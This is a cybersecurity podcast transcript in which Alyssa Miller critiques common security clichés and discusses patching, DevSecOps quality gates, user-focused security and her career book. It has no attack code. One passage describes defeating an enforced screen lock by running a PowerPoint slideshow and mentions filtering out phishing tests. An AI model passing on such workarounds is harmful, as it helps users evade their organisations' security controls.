Cybersecurity has a marketing problem — and we're going to fix it

On today's episode, we're breaking down phrases you've heard a million times: “security is everyone’s job,” “humans are the weakest link in the security chain,” “it’s not if you get breached, but when.” Returning guest Alyssa Miller drills into these comforting nostrums and explains why, even when they’re used for well-intended purposes, they often act to limit the conversation and the options, rather than address the hard work needed to overcome these evergreen problems. You’re not going to want to miss this one, folks! It’s all that, plus a little bit of book talk, today on Cyber Work!

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

  • 0:00 - Intro
  • 1:38 - Alyssa's tweet that inspired this episode
  • 4:00 - Why you need to read the Cybersecurity Career Guide
  • 9:10 - Cybersecurity platitudes and clichés
  • 11:30 - Cliché 1: "It's not if you get breached, but when"
  • 18:44 - Cliché 2:"Just patch your shit"
  • 24:58 - Cliché 3: "Users are the weakest link"
  • 32:34 - Cliché 4: "Security is everyone's job"
  • 35:52 - Cliché 5: What is a "quality gate"?
  • 44:14 - Cliché 6: "You just need passion to get hired"
  • 48:14 - How to write a better cybersecurity job description
  • 50:15 - Business value of diversity and inclusion
  • 52:52 - Building a security champions program
  • 55:12 - Where can you connect with Alyssa Miller?
  • 56:44 - Outro

[00:00:00] CS: Cyber Work listeners, I have important news before we dive into today's episode. I want to make sure you all know that we have a lot more than weekly interviews about cybersecurity careers to offer you. You can actually learn cybersecurity for free on our InfoSec skills platform. If you go to infosecinstitute.com/free and create an account, you can start learning right now.

We have 10 free cybersecurity foundation courses from podcast guest, Keatron Evans. Six cybersecurity leadership courses from also podcast guest, Cicero Chimbanda. 11 courses on digital forensics, 11 courses on incident response, seven courses on security architecture, plus courses on DevSecOps, Python for cybersecurity, JavaScript security, ICS and SCADA security fundamentals and more. Just go to infosecinstitute.com/free and start learning today. Got it? Then let's begin today's episode.

[INTRODUCTION]

[00:00:57] CS: Today on Cyber Work, it's the phrases we've all heard a million times. Security is everyone's job. The human is the weakest link in the security chain. It's not if you get breached, but when. Returning guest, Alyssa Miller drills into these comforting nostrums and explains why even when they're used for well-intentioned purposes, they often act to limit the conversation and the options, rather than address the hard work needed to overcome these evergreen problems. You're not going to want to miss this one, folks. It's all that, plus a little bit of book talk today on Cyber Work.

[INTERVIEW]

[00:01:39] CS: Welcome to this week's episode of the Cyber Work with InfoSec Podcast. Each week, we talk with a different industry thought leader about cybersecurity trends, the way those trends affect the work of InfoSec professionals while offering tips for breaking in, or moving up the ladder in the cybersecurity industry. My returning guest, Alyssa Miller is a lifelong hacker, security advocate and executive leader. She is the Business Information Security Officer, or BISO for S&P Global Ratings and has over 15 years’ experience in security and leadership roles.

She is heavily involved in the cybersecurity community as an internationally recognized speaker, author, content creator and researcher. Alyssa serves on the board of Epiphany Solutions Group, Blue Team Con and Circle City Con. She is a strong proponent for making the path into security careers easier and improving equity and diversity within the cybersecurity community.

Today's episode sprang from a tweet that Alyssa tweeted on May 14th, 2022. I'm going to read the tweet in full, because I just love it. Alyssa said, “Phrases that make me want to tear the vocal cords out of #InfoSec people. One, it's not if you get breached, but when. Tw,o just patch your shit. Three, users are the weakest link. Four, security is everyone's job. Five, quality gate. Everyone is just a lazy abdication of our accountability.”

If you didn't get a shiver of recognition on hearing at least one of those phrases, are you even really in the cybersecurity field? While some of these phrases might be well-intentioned, as Alyssa said, they are ultimately bombs meant to soothe self-inflicted injuries. If we actually want to progress boldly and tackle the very real and systemic problems in the industry head on, it's worthwhile to interrogate these commonly heard phrases, and see if we can come up with some better reframing of the problems and work towards real, more difficult, but lasting solutions.

Major line of this episode will be interrogating these phrases and coming up with viable solutions. I mean, we're not going to solve them today, but we're going to try. Alyssa, thanks for joining me today. Welcome back to Cyber Work. It's great to see you.

[00:03:39] AM: Thanks, Chris. I appreciate it. It's great to be back.

[00:03:42] CS: All right. Usually, to start with, I always recommend that listeners check out past episodes by our return guests. Alyssa tells us all about her security journey and her years of study and training and what to be so and lots more. Since it's been roughly a year, what are some projects you'd like to talk about that you've been working on? I know you have a book coming out soon.

[00:04:01] AM: Yes. We've been working on the book forever, it feels like. Actually, probably by the time this episode airs, should be available. I will have copies with me at RSA Conference, depending on when this airs, it may have already happened, or maybe –

[00:04:17] CS: Yeah. It might be in the past.

[00:04:19] AM: We'll see. I should actually have physical copies, binding, shipping. It's been a long road. Yeah, Cybersecurity Career Guide, with Manning Publications. I am thrilled to finally be getting this out there. All the feedback I've gotten from people who've looked at advanced copies of it, who bought the early access preview to it, the feedback has been phenomenal. I've already had a couple of people, quite honestly, and this is – yes, I'm bragging right now, but I don't care. I'm proud of this thing.

[00:04:51] CS: Brag away. This is a big deal.

[00:04:53] AM: At least two people reach out to me already and say that the book actually helped them land a job, which that to me right there as everything. I mean, the fact that I touched two people's lives, that's all I needed to know. Every ounce of effort I put into this, all the frustrations and anxieties, that's what the book is all about. I'm hopeful that it's going to connect with more people. I'm hopeful that I'm talking with some folks at different universities about how we can get the book available to their students and so forth. Just because, I think it brings that value and helping people navigate what right now is a really rocky road to try to start that career in cybersecurity.

[00:05:35] CS: Oh, yeah. I mean, the title Cybersecurity Careers, again, speaks for itself. Can you break down what's going on in the book chapter by chapter?

[00:05:43] AM: Yeah. I'll go by section. There's three main sections to the book. The first section is really just talking about the industry itself and what actually is cybersecurity? What are the jobs and what's involved? What is the story with this talent gap that we hear so much about? Addressing a lot of that. A lot of the research that I did over the last couple of years goes into that.

The second step is really about knowing and preparing yourself for that job search. It's your tangible exercise is just to figure out what area of cybersecurity should you be looking at that you're most likely to be a fit for you based on your interests? Because that's a question I get a lot. People are like, “Can you help me get into cybersecurity?” I'm like, “Okay. Well, what do you want to do?” “I want to do it all.” “Well, I can't do it all. Nobody can do it all. What are you talking about?” There are people who've been in this industry who retired from this industry. You can't do it all.

[00:06:43] CS: Yeah. It's like saying, I want to get into music. Could you narrow it down a little bit?

[00:06:48] AM: No one expects people to know all – This is the route I'm taking. It's going to be the right path, or anything else. Yeah, there's some exercises in there just to explore that. Then inventory skills and talk about how to really navigate job descriptions, because they're notoriously awful. Equipping a lot of tools.

Then the last section, the last three chapters is really focused on all right, you won the job, now how do you establish longevity? How do you position yourself, so attacking things like, I do delve into impostor syndrome and tools for how to deal with that? How to look at negotiating a job? How to look at moving along in your career planning? Having some goals and that sort of thing.

It's really comprehensive. I think it's probably valuable, even some people who are already working in the industry. Definitely, for those trying to either pivot in from another industry, or coming out of school, or something like that, we want that first job. It's definitely, I think, something that's going to prove valuable for a lot of people.

[00:08:00] CS: I love everything about that, and so many of the things that it's addressing and the fears that it's quelling are things that pop up in our comment section of these videos all the time. I know, people need to really go find that book. Go find Cybersecurity Career by Alyssa Miller. These are the things that are asking, how do I get experience without experience? How do I know what part of cybersecurity am I going to be good at? What if I don't like what I'm doing? How do I pivot? That's all-intangible things in the past that are now hopefully with your book, are very tangible answer to them.

[00:08:40] AM: Awesome. Yeah. I mean, I know it's going to help people, because like I said, I've already got confirmation. Yeah. I mean, if anyone's looking for it, by the way, the easiest way to get there is alyssa.link/book. Really, that simple. I got a URL redirector out there that makes it really easy, because otherwise, searching for it on Amazon, or on Manning site, or anything else, nah, make it easy for that.

[00:09:05] CS: Alyssa.link/book. Is that right?

[00:09:09] AM: Yup.

[00:09:09] CS: All right. Okay, so yeah, we're going to mostly structure this episode around all the points in your tweet that we were talking about before. I want to ask first, was there a specific moment, or a breaking point that brought you to vocalizing this in this way? Or was it something that's just been roiling in your head for a long time?

[00:09:28] AM: It's just been stewing. I mean, it's a lot of different things. I think, I did actually hear someone say one of them in a really just inappropriate environment. It was just like, that was kind of the thing. Yeah. I mean, all of them are things that we hear a lot. They're different platitudes and cliches that we throw out pretty recklessly in my opinion. We don't really consider the weight of the ramifications of the things we're saying and who's hearing it and how that impacts stuff. Like I said in the tweet, a lot of them are just like, it's a lazy abdication of our responsibility and things. Like, when we say, users are the weakest link, or whatever, it's counterproductive.

[00:10:18] CS: Yeah. There's statements that are meant to open up a conversation. Then there's statements that are meant to end the conversation. A lot of these feel like – I don't want to get into this. User is the weakest link. What are you going to do? Then, it seems like, it just narrows the options that we have. if we just say, “Oh, well. User is the weakest link. What are you going to do?” I was so excited about the idea of interrogating these and seeing what the harder version of that is, instead of saying like, “Well, we can't do anything about this.” We have to stop at that same point. Like, yes, users are a certain pain point in the network or whatever, but how do we do something about that, instead of just writing it off?

[00:10:59] AM: I mean, take what you just said, that a lot of them do come off as conciliatory, we're giving up. Well, if there's nothing we can do about it, then why do we exist? There is no point in having an information security team in your company if that information security team can't fix, or address these problems, right? I mean, why are we there? That goes right to every one of them, but the first one in particular.

[00:11:28] CS: Right. Let's start there. Let's start out with, it's not if you get breached, but when. There seems to be shorthand for saying that security breaches can happen even when the most advanced security measures are in place, and you can't rely solely on your security posture, keep the criminals out of the gates. There's a flip side to that coin, as you put it, becomes an abdication of responsibility on the part of the cybersecurity team on duty and the industry as a whole. Can you talk a little bit about this? What would be a better way to think about and reframe this idea?

[00:11:56] AM: Right. Let's take that apart. On the surface, it's 100% accurate. We all know that. We understand that. Imagine going in to say, an executive leadership meeting, or a board meeting where you're about to pitch an idea. You're asking for funding for something. You start off with the statement. This is a true story, by the way, of, it's not if we get breached, but when? Well, then why are you surprised when they're not going to spend money on your initiative? Hey, it's not if, but when. I can't do anything to stop it, but here, spend all this money on these tools that’s going to help me stop it.

[00:12:37] CS: Or any of that.

[00:12:39] AM: Now that's an extreme example. It’s a true story, but extreme. Even just by saying that, putting it out in the media, I mean, that exact quote was Robert Miller, the former FBI director, who said that in a public space. Now you have all these executives who are listening to that and saying, “Oh. Well, there's nothing we can do about getting breached. Well, then maybe I just focus my money on cyber insurance. Because if I can't stop getting breached, I need to make sure that the financial impacts of a breach are covered.” Then we wonder why we have trouble getting people to think beyond cyber insurance.

This is one of those things where yes, the statement is accurate. But stop saying it, because whose hearing it is being impacted in a very different way, and it's actually very counterintuitive and counterproductive to what we're trying to do. Instead, what I tell people is flip the script completely. Okay. The problem with that statement, it's not if, but when, is that it encourages focusing on the wrong thing. I mean, it's focusing us on we have to be – It's talking about, well, we have to be perfect in our cybersecurity efforts. Well, no. Turn the story to, we're focused on resiliency. We can say, it's not if, but when an attacker might breach our walls. We want to focus on being resilient to that, so that we limit the damage. I mean, I hear limit the blast radius, but I really hate military analogies and metaphors we use.

That's the thing. Change the conversation. Change the narrative completely. We're focused on resiliency. How do we detect and respond to attacks? Don't say react. Respond. We're not reacting. We shouldn't be reacting. Unfortunately, we do a lot. Responding to attacks. We know that things will happen. We put tools in place to detect them. We put tools in place to limit them and we put tools in place to specifically react, or respond to that after we've had the opportunity to analyze what's going on and do our thing.

The way I've talked about it previously is you got three types of defenses. I hate the military analogies, but here we go with one. Think about a castle, where they have walls and courtyards and then more walls and then courtyards and then they’ve got the keep, where all the important stuff is. Well, there's three types of defenses there. You've got the detection defenses, which are your lookouts, you've got mitigation defenses, which are aimed at just slowing down the attack, which is that space between those walls. Then you have the active defenses, which are your knights and archers and all the other stuff. We have all the weapons. Do the same thing with cybersecurity.

[00:15:42] CS: Yeah. Yeah, yeah. That makes a whole lot of sense. It is one of those sorts of subtle things. It reminds me of when people say, when we talk about fighting for civil rights, or whatever. The shutdown version of that is, oh, it's all just rigged. It's all just rigged. Everyone's against us. Because it shuts it down in a very specific way that says, there's nothing we can do about this. Why even try? Especially, like you said, when you have a C-suite person hearing that, they're like, “Great. I can put that money elsewhere, instead of, yeah.”

It also speaks to the lack of understanding that higher level people might have about what the security department actually does. It's not just the walls and the archers. It's the crafting of this multi-part security process. You can say, it's not if, but when and when we need to be ready with the certain strategies and like stuff that, right?

[00:16:42] AM: Yup. Exactly. It's not about preventing the breaches altogether. It's about limiting the risk of them and being able to respond when they do happen.

[00:16:54] CS: Yeah. That was one of the first mind-blowing things when I talked to an incident responder, and here was that idea that that the getting hacked, getting breached, being in there for a long time isn't even necessarily the thing. That's not the end game. My life is ruined. Everything's done. It's like, all right, take a breath. What do we do next? I think people think of security in that terms like, did we get breached this week? No. Okay, then security's working. Did we get breached this week? Yes. Our security plan is complete garbage, or something like that.

[00:17:24] AM: Oh, and there's another one that's not in that list that encourages that, the don't let a good crisis go to waste.

[00:17:31] CS: What does that mean exactly? Or how is that used essentially?

[00:17:33] AM: Well, the point of it is when you have a crisis, when you have a breach, everybody's wallets are open, so go get as much money as you can. Which just reinforces the idea that something was broken in our security infrastructure, and that's why we got breached. Instead of focusing on hey, you know what? We had this incident and we responded to it in these ways. We had these tools in place. As a result, we limited the impact to this. Now, we learned a couple things we want to invest a little bit more. By the way, if you showed them the positive impacts of your past investments, they’re more willing to give you money for new stuff. Yeah, that works.

[00:18:13] CS: Yeah. If you just asked for money without any indication, it's like, you've fell and skinned your knee and you asked for an ice cream cone or something like that. You’ll be like, “How many times are we going to do this?”

[00:18:24] AM: Everything that you spend money on now so far failed miserably, and we got breached, so give me more money to go spend.

[00:18:31] CS: I guarantee, it might happen again.

[00:18:34] AM: Yeah. Right. Wonder why CISOs get scapegoated after a breach. Because we don't know how to talk about it.

[00:18:43] CS: All right. Yeah. To move on to that, the second stock phrase in your list is “just patch your shit.” I like that phrasing. This is less about the inside versus outside, defensive versus savvy dichotomy last question and more about vulnerabilities with the assumption that if you're keeping up with updates and patches, you're doing the big work. Conversely, if something goes wrong, it's just because you didn't patch. We've had a lot of guests come on and talk about things like vulnerable doesn't necessarily mean exploitable, and the importance of vulnerability management and putting your work on parts of network that could actually be compromised. Is this what you're talking about here?

[00:19:16] AM: I mean, that's part of it. I mean, it's multifaceted. That's one part, right? It's like, well, if we just patched all ourselves, we'd be safe. No. Log4J. Thank you. Good night. That story's done. At the same time, what really frustrates me about it is that it treats those people who are responsible for patching. Our operations teams, our SREs, the people who are down there every day doing patching, it treats this like it's simple. Those people are just being lazy, or they're not doing their job well, because everything is in patched to the latest version, which is a complete line of trash.

I'll be blunt. They have that attitude. To pretend it's just easy to go get the next patch and apply it. Yeah, tell that to your SREs when they do that, and then the database blows up, or some data access layer is incompatible with that new version. Now you spend hours resolving an outage. The whole idea from security that we can just ignore the concept of the reliability of these things. the stability of the environment, in favor of security is so disconnected from the world of business, that it really puts us in an awful place.

I mean, this is where we get things department know-it-all, those nicknames and things that people say about us, because we don't consider that big picture. Instead, we get so focused on, well, if you just patched your shit, well, then we wouldn't have been breached. Okay, if you just put some mitigating controls in place, and whatever, we wouldn't have been breached either, so shut up. I mean, that's how I feel about it.

[00:21:09] CS: Can you expand on the mitigating control aspect of this? I don't understand these things, so please –

[00:21:17] AM: Take Log4J s a perfect example. Here's something that wasn't even patchable. I mean, this is a zero vulnerability. It's in 90% of Java apps. Everybody's got this problem, right? I mean, anybody who's dealing with Java apps has this problem. It's a package upgrade, which, by the way, those updates aren't necessarily backward-compatible. You didn't have an update initially, so what do you do instead? If you get breached by Log4J because you had it in your Java app before they had a fix out for, how can you say to someone go patch your shit?

Did you have wavs in place? Had you put in the necessary controls for outbound Internet traffic Because those two right there, the outbound internet traffic, if you weren't allowing that from your servers, immediately shut down the entire attack. I mean, the entire RCE with Log4J. If you weren't allowing that outbound traffic, it couldn't go out and load the additional – you make the additional calls that it need to make in order for this exploit to happen, you’re done. I mean, you were safe.

Now you can go patch your stuff when the patches came out. If you have a WAF in place, web application firewall, yeah, was it perfect? No. But you could limit very quickly, a lot of those vendors had signatures available to limit a lot of the attack strings. Again, did you have that available? Was that in place? There was a lot that security had to do there that is best practice and stuff that we talked about. If you didn't have it there, well, hey, we're as culpable as anyone else. In fact, more so, because there was again, no patch to be applied.

[00:23:09] CS: Yes. That's my question, and you answered it there that is a best practice. I don't understand this stuff as well, as you do, obviously. What you just said there as the solution, the mitigating devices, would that be something that most security departments would have known about and just didn't do, because XYZ reason?

[00:23:33] AM: Oh, for sure. Absolutely. I know there's people out there right now are saying, “Well, I can't get money for a WAF, or my business won't let me install it. Or we can't do network segmentation, or we can't control egress, because the business, this, that, the other thing.” No, I don't accept those excuses. Here's why. Our job as security people is to communicate the needs for these controls in a way that resonates with the business and motivates them to action. That's on us.

Now, that's not to say that if you do that perfectly, you're going to get unlimited budget to do all the things you want to do. No. But, we understand, or should understand from the cybersecurity side, how to prioritize those controls that we need. Where a lot of times we fall down is we fail to communicate it in a way. We try to come in with fear. We try to come in with stories of other breaches and all these other things. If you make this something where, hey, this is how I'm going to enable your business to make more money. This is how I'm going to enable you to innovate, or enter new markets, or something like that, connect your initiatives to that, you get a lot more support. But we're not real great at doing that in cybersecurity.

[00:24:50] CS: Yeah. Communication, communication, the great soft skill that we all ask for and don't always get. We come down to the phrase that also specifically raises my hackles, which is users are the weakest link. I find this annoying for two reasons. One is that as past guests of the show have said time and time again, thinking of your employees and users of your tech as weak links, devalues them as professionals and people and also, makes it harder for them to think for themselves as active participants in the security process.

The flip side, which I think is less pressed is the idea that absent the human factor with regards to things like social engineering, insider threat, or bad business practices, we'd all have these impenetrable forces and cybercrime would somehow shrivel away. I'm guessing, we can't machine learning our way into a perfectly sealed hermetic universe. What's a better way to think about humans that aren't some annoying anomaly, that our perfect machines have to deal with, but our actual benefactors and the reason for all this technology?

[00:25:49] AM: Yeah. There's a lot here, obviously, to unpack, too. First of all, the statement itself is one small step above users are stupid, right?

[00:25:58] CS: Yeah. Completely.

[00:26:00] AM: It's one step above the stupid user story, which is awful. To your first point, yeah, it's devaluing the people. Here's a question for you, though. Aren't your information security people also users in your environment?

[00:26:11] CS: Exactly. Yeah. They built a tech as well.

[00:26:17] AM: Right. How many of them have perfect track records on your phishing tests? Probably none. I won't go into my diatribe on phishing test today, because that's a whole other ball of wax. I mean, again, the problem with it is it's very dismissive. It's, well, we got these users, they're always going to be the problem. That's the human element. There's nothing we can do. Yeah. Because we do a lot of things that don't address the user issue. Phishing tests are one of them.

I mean, I actually have a different tweet thread out there. I guess, I'm getting into the phishing thing now, but about how easy it is to bypass, or to set up rules in Outlook to identify and quarantine, self-quarantine anything that's a phishing test. That's a perfect example of where you're actually encouraging the wrong behavior by your security awareness control in this case. When we say, users are the weakest link, we imply this immediate division between our user base and the security team, which is exactly again, the opposite of what we want. You want that to be the most collaborative, very interactive relationship. They're learning from us and here's the kicker, we're learning from them.

How are you using the tools we put in your hands? How you're using those tools impacts the things that we can do to secure them and to make it easier for you to keep yourself secure. What are we doing to make it, all right, can we block all links that are in email? Sure, we could probably set up some filter somewhere to strip out all the links. Is that reality, though? How's that going to work? Okay, so how do we do this differently?

Let's start with looking at the emails that our own systems send. Do they look like phishing? A lot of times, they do. Those kinds of things in the environment. All right, how can we set up, how can we take your ServiceNow notifications, for instance, and change those so that it's clear, they're not phishing attempts. So that we’re not encouraging people? Otherwise, you're just encouraging them to do the exact things you're trying to tell them not to do. Hey, here's this link, you got to click this link to go to your ServiceNow tickets; the only way you're going to get there. Or here, do this, click this link, and it'll send an email to approve this ticket.

Well, okay. Yeah, we don't give you anything other than a ticket ID to say any more, but how do we do that better? You see that. You see random survey monkey emails come in from HR teams looking for – because they're doing some employee engagement survey or something. Could we do a little better, please? That's where it's we really need that collaboration, because we should be working with those teams to say, let's talk about how we can do this in a way that it's not going to encourage silly behaviors that we don't want to see, including from within our own ranks.

[00:29:33] CS: Can you give me a concrete example in terms of things that you could learn from the users about the way they use the system, things that you've seen, like you said, learning is a two-way street. What are some things that you've seen from users that they're doing that make you – whereas otherwise, you might just force them to stop doing that and you're like, “Oh, okay. Well, we can work with it”?

[00:29:54] AM: Well, I mean, it's understanding workflows. You may have applications within your environment, where part of their workflow is they get an email notification that says, “Hey, this task has been assigned to you. Click here to go view it.”

[00:30:06] CS: Got it.

[00:30:07] AM: Understand that, okay, if you say no, don't do that, you now have to go through click a bookmark in your browser, go log in, as you all this. Understand that, yeah, that's more secure, but it's also something that's going to encourage them to bypass that control somehow, because that's going to be far more onerous than, “Hey, I just have to go here, click this link, it takes me right to my ticket. I don't have to do a search or anything else. It's just there.” That speeds up my workflow.

Because at the end of the day, so many of the phishing breaches, I mean, we're really narrow on phishing right now, but it's a great description for users and what users do. Most of the time that they fall to one of these – fall victim to one of these attempts, it's because they're in a rush, or they're trying to get through the processing through the 450 new emails they got in the last day.

I mean, sometimes you're going to see some. You're just not even thinking, or you're just in a certain mindset because of something else you were doing and that phishing email just happens to pop up at the right time.

Another example, and this is actually coming from a tweet, too, that same thread with the phishing one was, hey, did you know, you can bypass the automatic screensaver that your company forces on you just by running PowerPoint? You open up a PowerPoint presentation and put it into slideshow, your PC will never lock. It works on Mac. It works on PC, with Windows. It's, okay, so there again, now why would a user do that? Well, they may have other tools that have long running processes that then fail or reacted in some poor way when the screen locks.

Now, again, we've encouraged a behavior we don't want, instead of working with them to understand, okay, what is it about this tool? How can we address that differently? Is there maybe a temporary way that they can turn off the screensaver just for that moment? Whatever, some way to handle that. There again, perfect case where we can work closer with the users.

[00:32:33] CS: I love that. Next, I mean, sure, “security is everyone's job.” I get that in a general sense. If you're leaving the house for the night, lock the door on your way out. This is one that definitely feels the most, like the core of your thesis, that these are abdications of accountability in the cybersecurity industry. How do we move from security is everyone's job to say, something like, many hands make for a light work, but most of the work still has to be ours?

[00:33:00] AM: That's a way to put it. That's the thing, right? See, my problem with that phrase, again, it's not wrong. That's the thing, and most of these, they're not actually inaccurate, but they're just these platitudes and the way that they impact is the problem. You look at this, like okay, security is everyone's job, but look at the actions that occur behind that. We say, security is everyone's job. Therefore, let's shift left. Developers need to be responsible for application security. Developers need to be a part of it, but they're not alone in that. We're there with them.

Here's the bigger thing, and this is why it frustrates me. The DevSecOps message, were DevOps initially, is all around the idea of shared responsibility. You go back to 2008, when Andrew Schafer, Patrick Dubois, they get together and they come up with DevOps, and even call it that at first. DevOps, we're going to get operations and engineers, our developers all focused on a common set of responsibilities, that they're all responsible for. Efficient pipelines, stable code, availability in production, and everything's got to be fast. Remove all the silos, remove all the red tape, let's unite.

Four years later, security starts to actually really pay attention to this. Over time, the message from security is, “Well, yeah, yeah, yeah. That's great. That's great. That's great. Shared responsibility.” Everybody shares responsibility for security. Okay. We missed the other half of that equation. If we're asking them to be responsible for security, we need to be as security people, responsible for the efficiency of that pipeline. We need to be responsible as we were talking earlier, for the availability and stability of that environment when these things hit production; the performance of that production environment.

We can't stand there and say, “Yes, I know this slows you down, but we need this security control.” Or, I'm going to put this quality gate that you have to run a code scan every build. By the way, we farm that off to a third party, and it takes them two days to respond? No, you can't do that, because now you're breaking the pipeline. That's where it's like, yes, security is everybody's responsibility. If we're going to say that, then you know what? Pipeline efficiency is everybody's responsibility. Production availability and stability is everybody's responsibility, including ours. We can't walk away from that.

[00:35:53] CS: Now, of all the phrases that you mentioned in your tweet, and use mentioned just now quality gate is the one I'm least familiar with. I did a bit of online sleuthing, and I feel I could fake along in a conversation. For our listeners, can you give me more about the concept of quality gate and where the idea breaks down, or doesn't go far enough, or focuses on the wrong aspects of things?

[00:36:12] AM: It's actually what I was just describing. I forgot that this one was coming. It was a nice segue, actually. Hey, look at me. Like I’ve done this before or something. Quality gate is that idea that we set this gate in the pipeline. You think of the different phases of pipeline. You got design, and you're coding, then you're building, you're promoting, you're testing, you're deploying, and then you got post production support loosely, I mean, people will structure those differently, and whatever, they call them different things, but you've got these different phases. The idea of a quality gate is that between those phases, we put something that says, we're going to ensure the quality by doing some other step. That step has to pass in order for that gate to open.

The common example, from a security perspective is what I was just describing. When you run your build, part of that process, and we automate the crap out of this, because DevOps, everybody's focused on automation, and rightfully so. We automate a sassed scan, a code scan, and we say, well, if you have any Hiser criticals, you have to go back and fix those before you can move on from the build process. Well, okay, now that scan runs. How long does the code scan take? Well, if you're sending it to certain providers out there, it takes days. Even if you've got a tool in house that you're leveraging, it can take hours, depending on the code base, how much is getting scanned, how you have configured, all that happy stuff.

Now, that threatens to break the pipeline, because the pipeline should flow in one direction. It's a pipeline. Does the water in your house suddenly start flowing the other direction? That would be bad. That’s not how pipelines work. Same thing with things like gasoline pipelines, okay. Pipelines go one direction. Quality gates threatens to undo all of that and be sent all the way back.

Where it's especially problematic is when those feedback loops are long, like I said, or when they're inaccurate. We think about things like code scans, for instance, those things are fraught with false positives, or they find a vulnerability that is, to your point early in the show, it's vulnerable, but it's not exploitable, because, oh, yeah, there's no way to actually get to that code. Now you have that situation, okay, the engineer’s got to look at it, they got to figure out, is it actually vulnerable? How am I going to fix it, everything else?

Whereas, if we focus on pipeline efficiency, focus on that idea of CICD, continuous integration, continuous deployment, where we can get that pipeline sped up to the point that we're doing multiple deploys per day. This is the thing that scares the living shit out of security people. Deploy that stuff with the vulnerabilities in it. Deploy it. Don't stop them. Let them deploy it. If your pipeline is efficient that you can fix it in a day or less, or whatever the acceptable timeframe is for you, from a risk perspective, think about that. You identify the vulnerabilities, still run that scan at build time, but don't stop them.

Any of those higher criticals now go back into their backlog as P1, their top, P0, whatever you call it. Whatever that thing is that you don't – this is in the very next development cycle no matter what. Put it in there like that. Let them fix it then. Now it comes through and the development pipeline still moves in one direction, because you've just created new backlog items. Now, if you've focused on making your security tools help the efficiency of that pipeline and you're getting really good at CICD. Well, now you're going to fix it in a matter of hours or days anyway, how much risk is there from letting that that vulnerability go through?

Better yet, what if you've also got other mitigations in your production environment, that you've identified those things, so you know you can pass that on to the SREs and say, “All right. For this app, we've got to be aware of this type of attack against this.” Maybe as part of that, now you deploy a web application firewall rule, or a regular firewall rule, and whatever you got to do, there are ways to put those mitigations in place to further reduce the risk. The point is you haven't stopped the pipeline from flowing. That's what's crucial here.

[00:40:36] CS: Got it. Yeah. Well, I live in Chicago where we reversed a river to go away, so I'm not opposed to -

[00:40:45] AM: That’s a little different.

[00:40:46] CS: A little different. A little different.

[00:40:47] AM: It does a lot of weird things.

[00:40:49] CS: Oh, yeah. Oh, tell me about it.

[00:40:51] AM: I mean, I got three words for you. Upper Wacker drive. Taco does weird things.

[00:40:58] CS: You apologize to Wacker Drive. It's a national treasure.

[00:41:01] AM: Don’t you all in Chicago, you’ve done to myself. I love y'all. Come on.

[00:41:06] CS: No, I know. I know. Okay. Again, like you said, with the automation love that security apartments have, I imagine a lot of these mitigations that you could put in could also be automated, right? If you said, we know there's a vulnerability coming. Put these gates up until the next micro deployment comes or whatever. Then [inaudible 00:41:30].

[00:41:30] AM: Isn’t that great? I mean, a lot of the vulnerabilities you're getting out of these tools are pretty standardized. I mean, it might show up in different places, but you can say, “All right. We now know that this, going back to the old days, this parameter is vulnerable to SQL injection or something like that.” Okay, that easily can translate in an automated fashion to, we're going to deploy a WAF rule that's watching this specific field for anything that will come through.

Now, I mean, it shouldn't be doing that anyway. I mean, it's probably not the best example, but we're going to watch for signatures and SQL injection on this field. Okay, so now you've got something there. I mean, and now you're limiting that whole concept of break the build, which is everything I just described of hey, your results are not acceptable. We're breaking your build and sending you back. All right. Let's get better at that. This is where we get into one of those cliched terms, I'll say, that CISOs are using. Well, it's about business enablement.

Well, if you can speed up that pipeline, you now and security are part of business enablement. Reducing risk isn't business enablement. Making this faster, more efficient, more innovative, making more money, that's business enablement.

[00:42:54] CS: I love that. Also, all of these are great inversions, but that one especially feels like it could change the whole industry. I hope people are listening. I think that's amazing. Yeah.

[00:43:06] AM: We'll get there. I hope so. I mean, this is a message I've done on bazillion DevOps talks and DevSecOps talks on this.

[00:43:16] CS: What is the feedback? I mean, are people resistant to this idea?

[00:43:19] AM: Yes. Oh, very much so. Look at the thread that we've been quoting this from, the number of people came at me hard about it. They blasted me. Or the other thread I mentioned with this. I literally told people. “Here's how you identify phishing tests. Here's how you can never have to deal with them again. Here's how you bypass your screensaver.” I had security people like – I mean, I'm surprised I wasn't getting death threats with as virulent as some of these people were. They were angry. I'm like, “Stop and think about it. If I'm saying it, you think that there aren't non-security people doing the exact same thing?”

It was a challenge to all of us, me included in the security space to get better, and analyze how the things that we do that are well-intentioned may actually be counterproductive and creating behaviors, encouraging behaviors that we don't want. That's the problem.

[00:44:14] CS: Yeah. Now, I feel like we could do an entire second episode on some of the corresponding stock terms we hear when discussing cybersecurity career advice and job hunting tips in cybersecurity. You have phrases like, “If we can see your enthusiasm, we don't care if you have a degree.” And it sounds great. We aren't playing out in the real world as evidenced by all the folks in the comments saying, they have real experience in a pile of certs and don't get calls back on any job posting.

If the issues of the phrases in your tweet is abdication of accountability, the stock phrases in the employment side I think have a bright side in quality. We're rolling out the red carpet, and we just don't know why no one's walked through the door yet. What are some antidotes to phrases like, if you show enthusiasm, we’ll teach you the tools. And how do we move to a system where that's actually true?

[00:44:58] AM: If I hear someone say that, the first thing I do is I look at their job description. If that's got a laundry list of tools, I say, you're already doing it wrong. You're not living what you're saying. That's what we see. I told you, I did the research for the book. One of the most common things. One of the questions I asked was, what is one thing you would say to somebody looking to get into the industry? There's one word that showed up more often than anything else. Passion. Show your passion. Have passion.

People are not hiring on passion, no matter how much they claim they are. Because we're putting out these massive job descriptions that lists these laundry lists of different technologies and things that you have to know. Well, if we're saying, I just want to see your passion, I can teach you the technology, then why are those requirements there? Maybe list a few as nice to haves, that your people call it different things, but you've got the requirements, and you've got the – this will be even better for this job. Put it in there. That, by the way, is also where certs should land.

I mean, you see, these things are hyper-focused basic – if I’m going to break this down, and this is the topic of a talk I've proposed to a conference. I'm hoping to give it. We spend a lot of time in our job descriptions, telling people why they should not apply to our job. We put those list in there. Here's all the things, if you don't have this, we're less interested in you. That's the way. Again, unintended consequences of what we're doing. Instead, craft your job descriptions so that they encourage people to apply. Give them reasons to want to apply to that job.

